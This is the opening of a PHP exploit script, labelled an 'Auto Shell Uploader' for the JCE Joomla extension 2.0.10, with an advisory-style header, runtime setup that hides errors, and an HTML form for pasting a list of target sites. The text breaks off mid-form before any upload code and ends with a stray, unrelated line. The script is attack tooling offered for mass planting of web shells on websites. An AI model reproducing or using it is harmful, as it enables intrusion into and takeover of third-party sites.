<?php
######################################### ########################################
#
# AmnPardaz Security Research & Penetration Testing Group
#
#
# Title: Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version
# Author: HocineOverX
# Vendor: http://www.joomlacontenteditor.net
# Vulnerable Version: JCE 2.0.10 (prior versions may also be affected)
# Exploitation: Remote with browser
# Original Advisory: http://www.bugreport.ir/index_78.htm
# Vendor supplied patch: http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score: (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5
# Coded By: Mostafa Azizi
###################################################################################################
// Runtime configuration applied before any output is produced.
// Report no PHP errors, warnings or notices from this point on, so
// failures in the rest of the script are not shown.
error_reporting(0);
// Flush the output layer after every output call instead of buffering.
ob_implicit_flush(true);
// Socket-based stream operations default to a 2-second timeout.
ini_set('default_socket_timeout', '2');
// A value of 0 removes the script execution time limit.
ini_set('max_execution_time', '0');
echo'<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
</head>
<body bgcolor="#00000">
<p align="center"><font size="4" color="#00ff00">TurkGuvenligi.net 0day Joomla shell Uploader</font></p>
</font>
<table width="90%">
<tbody>
<tr>
<td width="43%" align="left">
<form name="form1" action="'.$SERVER[PHP_SELF].'" enctype="multipart/form-data" method="post">
<p></font><font color="#00ff00" > siteleri aþaðýdaki kutuya yazýn (ex:www.sitename.com): </font><br><textarea name="sitelist" cols="40" rows="10" class="siyah" id="sitelist">
Omg... go study russian!